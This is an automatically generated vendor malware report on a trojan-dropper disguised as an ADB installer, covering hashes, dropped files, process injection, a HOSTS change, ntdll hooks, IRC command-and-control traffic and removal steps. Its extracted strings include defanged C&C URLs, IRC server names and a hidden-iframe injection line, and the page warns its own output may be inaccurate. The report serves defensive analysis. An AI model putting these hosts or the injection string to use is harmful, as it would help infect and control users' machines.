Win32.Madangel.DIA_3618e0e786

by malwarelabrobot on September 14th, 2016 in Malware Descriptions.

Trojan-Dropper.Win32.Injector.pbuu (Kaspersky), Win32.Madangel.DIA (B) (Emsisoft), Win32.Madangel.DIA (AdAware), Trojan.Win32.IEDummy.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 3618e0e786d697dfb092edf82fd5e278
SHA1: 5b33fb886186a3e436d5174f14cfb19914973776
SHA256: 39df421489ec3bdb3eaadc407950d4680e72351916c5e240b5fe598a7a48498a
SSDeep: 196608:EwYvfXDBYhBpeLHe3 EPegZT3VCz0TByC Py7FU LCZAsdX3LBO:vibBYDey3PFCuByPyhRwxBB
Size: 9659089 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-12-31 02:38:38
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for the stealthy installation of other malware onto the user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:928
%original file name%.exe:484
%original file name%.exe:1504
iexplore.exe:1252
Explorer.EXE:1140

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:928 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Internet Explorer\IEXPLORE.EXE (332 bytes)
%System%\Serverx.exe (1504347 bytes)

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\winusbcoinstaller2.dll (10100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinApi.dll (1862 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\adb.exe (9241 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WdfCoInstaller01009.dll (12517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\winusbcoinstaller2.dll (8723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusb86.cat (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x86.exe (7803 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\NOTICE.txt (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WdfCoInstaller01009.dll (12376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x64.exe (9828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WUDFUpdate_01009.dll (18515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\android_winusb.inf (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinUsbApi.dll (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusba64.cat (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\NOTICE.txt (236 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\install.bat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\xp\SETX.exe (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\fastboot.exe (5044 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WUDFUpdate_01009.dll (15584 bytes)

Registry activity

The process %original file name%.exe:928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "35 E9 06 11 44 AD 03 63 7D 65 49 E7 B5 3A 75 CE"

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 EE 5F AE E0 40 BE F4 D2 9A BD 28 DE A1 C4 32"

Dropped PE files

MD5 File path
47a6ee3f186b2c2f5057028906bac0c6 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\adb\AdbWinApi.dll
5f23f2f936bdfac90bb0a4970ad365cf c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\adb\AdbWinUsbApi.dll
9e5dad83671d0d441be8347be4c246be c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\adb\adb.exe
c3b07cfe26d2b91a2bcb20a8d535a365 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\adb\fastboot.exe
0df1cb11aea7a66124fd18b4b15990a5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x64.exe
6cb18e67db5c9f7da56d126f4b9d45a4 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x86.exe
ebf9ee8a7671f3b260ed9b08fcee0cc5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\amd64\WUDFUpdate_01009.dll
4da5da193e0e4f86f6f8fd43ef25329a c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\amd64\WdfCoInstaller01009.dll
246900ce6474718730ecd4f873234cf5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\amd64\winusbcoinstaller2.dll
e1bbe9e3568cf54598e9a8d23697b67e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\i386\WUDFUpdate_01009.dll
a9970042be512c7981b36e689c5f3f9f c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\i386\WdfCoInstaller01009.dll
8e7b9f81e8823fee2d82f7de3a44300b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\driver\i386\winusbcoinstaller2.dll
aa1de4f07624771108a0a2b43e3bdc6d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\7ZipSfx.000\xp\SETX.exe

HOSTS file anomalies

The Trojan modifies the "%System%\drivers\etc\hosts" file, which is used to map host names to IP addresses.
The modified file is 734 bytes in size. The following strings are added to the hosts file:

127.0.0.1 ZieF.pl


Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtCreateProcessEx
NtCreateProcess
NtCreateFile

Propagation

VersionInfo

Company Name: Snoop0
Product Name: 15 seconds ADB Installer
Product Version: 1.4.
Legal Copyright:
Legal Trademarks:
Original Filename: adb-installer-1.4.3.ex
Internal Name: adb-installe
File Version: 1.4.
File Description: 15 seconds ADB Installer
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 389120 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 393216 57344 55296 5.5262 18aa317adce1d31150ddba79a7e3d9c4
.rsrc 450560 9603281 9603281 5.52583 8c9b2be20e3037633fb98baad338566c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
irc.zief.pl 148.81.111.121


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN IRC Nick change on non-standard port

Traffic

NICK ccqzsjif.USER j020501 . . :#a8a67a25e Service Pack 3.JOIN #.364.



:irc 001 ccqzsjif :Hi virtu.:irc 376 ccqzsjif :End of /MOTD command.:irc 001 ccqzsjif :Hi virtu.:irc 376 ccqzsjif :End of /MOTD command..:ccqzsjif JOIN #.364..:ccqzsjif JOIN #.364.


The Trojan connects to the servers at the following location(s):

%original file name%.exe_928:

!Require Windows
.rsrc
:=i|%dH
%X]-$pp
*{k%u
''yL
.NNNNNNNNNNNNNNNN
.NNNNNNNNNNNNNNN
<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
RunProgram="waitall:install.bat"
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
A.HK30
1.4.3
adb-installer-1.4.3.exe

%original file name%.exe_928_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
1.4.3
adb-installer-1.4.3.exe

%original file name%.exe_928_rwx_00D95000_00002000:

\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe

%original file name%.exe_1504:

!Require Windows
`.rsrc
PSSSSSSh
<x%u<
ttNt_Nt.Nt
:Language:%u
Enter password:
0xx
"%s".
Could not overwrite file "%s".
Could not create file "%s".
0xX.
7-Zip: Internal error, code 0xX.
7-Zip: Internal error, code %u.
The archive is corrupted, or invalid password was entered.
7-Zip: Unsupported method.
Error during execution "%s".
"setup.exe"
Could not find "setup.exe".
Could not find command for "%s".
Could not delete file or folder "%s".
Could not create folder "%s".
Error in line %d of configuration data:
Could not open archive file "%s".
1.6.0 develop [x86]
2712 (30
1.6.0 develop [x86] build 2712 (December 30, 2012)
Supported methods and filters, build options:
Sorry, this program requires Microsoft Windows 2000 or later.
CreateIoCompletionPort
_acmdln
ShellExecuteW
ShellExecuteExW
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
.text
`.rdata
@.data
.rsrc
.NNNNNNNNNNNNNNNN
.NNNNNNNNNNNNNNN
<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
RunProgram="waitall:install.bat"
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK gvhmdwhu
SFC.DLL
SFC_OS.DLL
SHLWAPI.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
X%cX%c
SfxString%d
SfxFolderd
PasswordTitle
PasswordText
%X - X - X - X - X
7ZSfxx.cmd
setup.exe
7ZipSfx.x
SfxVarCmdLine1
SfxVarCmdLine2
SfxVarCmdLine0
@ (%d%s)
1.4.3
adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_00401000_0006B000:

PSSSSSSh
<x%u<
ttNt_Nt.Nt
:Language:%u
Enter password:
0xx
"%s".
Could not overwrite file "%s".
Could not create file "%s".
0xX.
7-Zip: Internal error, code 0xX.
7-Zip: Internal error, code %u.
The archive is corrupted, or invalid password was entered.
7-Zip: Unsupported method.
Error during execution "%s".
"setup.exe"
Could not find "setup.exe".
Could not find command for "%s".
Could not delete file or folder "%s".
Could not create folder "%s".
Error in line %d of configuration data:
Could not open archive file "%s".
1.6.0 develop [x86]
2712 (30
1.6.0 develop [x86] build 2712 (December 30, 2012)
Supported methods and filters, build options:
Sorry, this program requires Microsoft Windows 2000 or later.
CreateIoCompletionPort
_acmdln
ShellExecuteW
ShellExecuteExW
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
.text
`.rdata
@.data
.rsrc
X%cX%c
SfxString%d
SfxFolderd
PasswordTitle
PasswordText
%X - X - X - X - X
7ZSfxx.cmd
setup.exe
7ZipSfx.x
SfxVarCmdLine1
SfxVarCmdLine2
SfxVarCmdLine0
@ (%d%s)

%original file name%.exe_484:

!Require Windows
`.rsrc
PSSSSSSh
<x%u<
ttNt_Nt.Nt
:Language:%u
Enter password:
0xx
"%s".
Could not overwrite file "%s".
Could not create file "%s".
0xX.
7-Zip: Internal error, code 0xX.
7-Zip: Internal error, code %u.
The archive is corrupted, or invalid password was entered.
7-Zip: Unsupported method.
Error during execution "%s".
"setup.exe"
Could not find "setup.exe".
Could not find command for "%s".
Could not delete file or folder "%s".
Could not create folder "%s".
Error in line %d of configuration data:
Could not open archive file "%s".
1.6.0 develop [x86]
2712 (30
1.6.0 develop [x86] build 2712 (December 30, 2012)
Supported methods and filters, build options:
Sorry, this program requires Microsoft Windows 2000 or later.
CreateIoCompletionPort
_acmdln
ShellExecuteW
ShellExecuteExW
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
.text
`.rdata
@.data
.rsrc
.NNNNNNNNNNNNNNNN
.NNNNNNNNNNNNNNN
<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
RunProgram="waitall:install.bat"
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
A.HK30
X%cX%c
SfxString%d
SfxFolderd
PasswordTitle
PasswordText
%X - X - X - X - X
7ZSfxx.cmd
setup.exe
7ZipSfx.x
SfxVarCmdLine1
SfxVarCmdLine2
SfxVarCmdLine0
@ (%d%s)
1.4.3
adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
1.4.3
adb-installer-1.4.3.exe

%original file name%.exe_1504_rwx_00D8C000_00006000:

WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll
ADVAPI32.DLL
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoyirc.zief.pl
proxim.ircgalaxy.pl
NICK gvhmdwhu
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 ZieF.pl
#<iframe src="hXXp://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
KERNEL32.DLL
MPR.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run

%original file name%.exe_1504_rwx_00D93000_00004000:

.idata
.reloc
KERNEL32.dll
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt

iexplore.exe_1252:

%?9-*09,*19}*09
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
ADVAPI32.dll
MsgWaitForMultipleObjects
IExplorer.EXE
IIIIIB(II<.Fg
7?_____ZZSSH%
)z.UUUUUUUU
,....Qym
````2```
{.QLQIIIKGKGKGKGKGKG
;33;33;0
8888880
8887080
.ucB^
%CQ@G
W:\M!q
browseui.dll
shdocvw.dll
6.00.2900.5512 (xpsp.080413-2105)
Windows
Operating System
6.00.2900.5512

%original file name%.exe_484_rwx_00401000_0006B000:

PSSSSSSh
<x%u<
ttNt_Nt.Nt
:Language:%u
Enter password:
0xx
"%s".
Could not overwrite file "%s".
Could not create file "%s".
0xX.
7-Zip: Internal error, code 0xX.
7-Zip: Internal error, code %u.
The archive is corrupted, or invalid password was entered.
7-Zip: Unsupported method.
Error during execution "%s".
"setup.exe"
Could not find "setup.exe".
Could not find command for "%s".
Could not delete file or folder "%s".
Could not create folder "%s".
Error in line %d of configuration data:
Could not open archive file "%s".
1.6.0 develop [x86]
2712 (30
1.6.0 develop [x86] build 2712 (December 30, 2012)
Supported methods and filters, build options:
Sorry, this program requires Microsoft Windows 2000 or later.
CreateIoCompletionPort
_acmdln
ShellExecuteW
ShellExecuteExW
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
.text
`.rdata
@.data
.rsrc
X%cX%c
SfxString%d
SfxFolderd
PasswordTitle
PasswordText
%X - X - X - X - X
7ZSfxx.cmd
setup.exe
7ZipSfx.x
SfxVarCmdLine1
SfxVarCmdLine2
SfxVarCmdLine0
@ (%d%s)

%original file name%.exe_484_rwx_004B8000_00001000:

<assemblyIdentity version="1.6.0.2712" name="7-Zip.SfxMod" type="win32"></assemblyIdentity>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df"></assemblyIdentity>
<requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
KERNEL32.DLL
ADVAPI32.dll
COMCTL32.dll
GDI32.dll
MSVCRT.dll
ole32.dll
OLEAUT32.dll
SHELL32.dll
USER32.dll
1.4.3
adb-installer-1.4.3.exe

iexplore.exe_1252_rwx_00401000_00002000:

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess
IE-X-X
rsabase.dll
System\CurrentControlSet\Control\Windows
dw15 -x -s %u
watson.microsoft.com
IEWatsonURL
%s -h %u
iedw.exe
Iexplore.XPExceptionFilter
jscript.DLL
mshtml.dll
mlang.dll
urlmon.dll
wininet.dll
shdocvw.DLL
browseui.DLL
comctl32.DLL
IEXPLORE.EXE
iexplore.pdb
msvcrt.dll
ADVAPI32.dll
KERNEL32.dll
MsgWaitForMultipleObjects
USER32.dll
SHLWAPI.dll
SHDOCVW.dll
IExplorer.EXE
browseui.dll
shdocvw.dll

%original file name%.exe_484_rwx_00D8C000_00001000:

WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt
.idata
.reloc
KERNEL32.dll

%original file name%.exe_484_rwx_00D91000_00001000:

USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt

%original file name%.exe_484_rwx_00D93000_00004000:

.idata
.reloc
KERNEL32.dll
USER32.DLL
ADVAPI32.DLL
MPR.DLL
WSOCK32.DLL
SHELL32.DLL
hXXp://vguarder.91i.net/user.htm
hXXp://vguarder.bravehost.com/user.htm
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
WinExec
RegNotifyChangeKeyValue
RegOpenKeyA
ShellExecuteA
\setupx.exe
\updatex.exe
\Serverx.exe
=.exet
=.scrt

iexplore.exe_1252_rwx_00418000_00006000:

.ucB^
%CQ@G
W:\M!q
6.00.2900.5512 (xpsp.080413-2105)
IEXPLORE.EXE
Windows
Operating System
6.00.2900.5512

Explorer.EXE_1140_rwx_00FF0000_00001000:

%System%\Serverx.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager): No processes have been created.
  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    %Program Files%\Internet Explorer\IEXPLORE.EXE (332 bytes)
    %System%\Serverx.exe (1504347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\winusbcoinstaller2.dll (10100 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinApi.dll (1862 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\adb.exe (9241 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WdfCoInstaller01009.dll (12517 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\winusbcoinstaller2.dll (8723 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusb86.cat (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x86.exe (7803 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\NOTICE.txt (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WdfCoInstaller01009.dll (12376 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\DPInst_x64.exe (9828 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\amd64\WUDFUpdate_01009.dll (18515 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\android_winusb.inf (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\AdbWinUsbApi.dll (392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\androidwinusba64.cat (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\NOTICE.txt (236 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\install.bat (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\xp\SETX.exe (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\adb\fastboot.exe (5044 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\7ZipSfx.000\driver\i386\WUDFUpdate_01009.dll (15584 bytes)

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
